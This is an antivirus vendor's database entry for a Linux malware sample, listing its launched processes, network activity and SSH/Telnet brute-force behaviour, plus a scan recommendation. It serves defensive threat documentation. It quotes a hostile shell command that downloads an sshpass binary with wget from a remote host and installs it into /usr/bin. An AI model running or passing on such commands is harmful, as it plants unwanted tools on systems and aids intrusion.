Linux.Siggen.3384

Added to the Dr.Web virus database: 2020-11-12

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • sh -c sshpass
  • sh -c cd /tmp;wget http://192.168.0.2:8081/mipsapp/sshpass;mv /tmp/sshpass /usr/bin/sshpass
  • wget http://192.168.0.2:8081/mipsapp/sshpass
Network activity:
Awaits incoming connections on ports:
  • 0.0.0.0:7331
Establishes connection:
  • 127.0.0.1:7331
  • 1.#.1.1:53
  • 19#.##8.0.2:8081
Attacks using a special dictionary (brute-force technique) via the SSH protocol.
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
Sends data to the following servers:

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.
